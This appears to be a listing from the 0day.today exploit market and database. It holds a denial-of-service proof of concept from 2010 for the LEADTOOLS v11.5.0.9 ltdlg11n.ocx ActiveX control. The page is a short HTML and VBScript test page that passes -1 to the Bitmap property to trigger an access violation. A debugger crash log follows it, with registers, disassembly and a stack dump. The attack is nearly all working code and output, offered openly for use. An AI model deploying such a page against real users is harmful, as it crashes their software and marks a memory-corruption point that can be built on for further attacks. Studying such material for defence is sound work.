[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LEADTOOLS v11.5.0.9 ltdlg11n.ocx Bitmap Access Violation

Author
Matthew Bergin
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14759
Category
dos / poc
Date add
06-11-2010
Platform
windows
========================================================
LEADTOOLS v11.5.0.9 ltdlg11n.ocx Bitmap Access Violation
========================================================

<html>
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype  = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid     = "LEADDlgLib.LEADDlg"
argCount   = 1
 
arg1=-1
 
target.Bitmap = arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AA62D2  CMP DWORD PTR [EAX],6461656C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
 
 
Registers:
--------------------------------------------------
EIP 00AA62D2
EAX 00000000
EBX 7C80FF22 -> A868146A
ECX 02AB2128 -> 00000000
EDX 00150608 -> 7C97E5A0
EDI 02AB2128 -> 00000000
ESI 02AB1F58 -> 00AB07C0
EBP FFFFFFFF
ESP 0013ED98 -> 00AA6292
 
 
Block Disassembly:
--------------------------------------------------
AA62BE  POP EBX
AA62BF  RETN 8
AA62C2  PUSH DWORD PTR [ESP+4]
AA62C6  CALL [AB00EC]
AA62CC  MOV ECX,[ESP+8]
AA62D0  MOV [ECX],EAX
AA62D2  CMP DWORD PTR [EAX],6461656C      <--- CRASH
AA62D8  JE SHORT 00AA62DF
AA62DA  AND DWORD PTR [ECX],0
AA62DD  JMP SHORT 00AA62E2
AA62DF  MOV EAX,[EAX+8]
AA62E2  RETN 8
AA62E5  PUSH ESI
AA62E6  MOV ESI,[ESP+8]
AA62EA  LEA ECX,[ESI-60]
 
 
Stack Dump:
--------------------------------------------------
13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00  [.b..............]
13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77  [.`...........\.w]
13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02  [X...............]
13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02  [....\....b.wX...]
13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00  [`...............]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)



#  0day.today [2024-12-24]  #